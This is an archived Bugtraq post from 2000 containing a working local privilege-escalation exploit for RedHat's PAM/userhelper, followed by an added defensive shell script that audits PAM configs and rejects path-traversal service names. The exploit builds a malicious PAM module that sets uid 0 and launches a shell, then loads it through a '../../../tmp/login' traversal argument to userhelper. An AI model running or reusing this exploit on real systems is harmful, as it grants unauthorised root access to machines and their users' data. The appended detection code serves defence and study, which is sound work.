Bugtraq mailing list archives
userhelper/PAM exploit
From: super () CE NET (Derek Callaway)
Date: Wed, 5 Jan 2000 00:21:26 -0500
#!/bin/sh
# userrooter.sh by S <super () innu org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!

LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
then
  echo "Machine doesn't appear to be vulnerable :-\\"
  echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
  setuid(0);
  puts("userrooter by S");
  system("/bin/sh");
  exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
  setuid(0);
  puts("userrooter by S");
  system("/bin/sh");
  exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login

--
/* Derek Callaway <super () ce net>     char *sites[]={"http://www.geekwise.com",
   Programmer; CE Net, Inc.             "http://www.freezersearch.com/index.cfm?aff=dhc",
   (302) 854-5440 Ext. 206              "http://www.homeworkhelp.org",0}; */
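Added example, not part of the original post: a defender-side check for the two conditions the script above relies on, a service name containing a path and a PAM config line naming a module outside the system module directories. The function names and the TRUSTED_DIRS list are assumptions made for illustration; the sample file is constructed.

```shell
#!/bin/sh
# Added defensive example; not part of the original post.
# Assumption: the directories below are where this system keeps PAM modules.
TRUSTED_DIRS="/lib/security /lib64/security /usr/lib/security /usr/lib64/security"

# Succeed only for a plain file name, so a service name cannot step out of
# /etc/pam.d the way "../../../tmp/login" does.
service_name_ok() {
    case "$1" in
        ""|.|..|*/*) return 1 ;;
        *) return 0 ;;
    esac
}

# Print every absolute module path in PAM config FILE that lies outside
# TRUSTED_DIRS; return 1 if at least one was found.
audit_pam_file() {
    file=$1 found=0
    while read -r type control rest || [ -n "$type" ]; do
        case "$type" in ""|"#"*) continue ;; esac
        # A bracketed control such as [success=1 default=ignore] has spaces.
        case "$control" in
            "["*"]") ;;
            "["*) rest=${rest#*\]} ;;
        esac
        set -f; set -- $rest; set +f
        module=${1:-}
        # Bare names like pam_unix.so resolve in the default module directory.
        case "$module" in /*) ;; *) continue ;; esac
        trusted=no
        for d in $TRUSTED_DIRS; do
            if [ "${module%/*}" = "$d" ]; then trusted=yes; fi
        done
        if [ "$trusted" = no ]; then
            echo "$file: untrusted module path $module"
            found=1
        fi
    done < "$file"
    return "$found"
}

# Constructed sample mirroring the config file written by the script above.
sample=$(mktemp)
printf '%s\n' '#%PAM-1.0' 'auth required /tmp/pamper.so' \
    'account required pam_unix.so' > "$sample"
audit_pam_file "$sample" || echo "review this file before trusting it"
service_name_ok "../../../tmp/login" || echo "rejected service name"
rm -f "$sample"
```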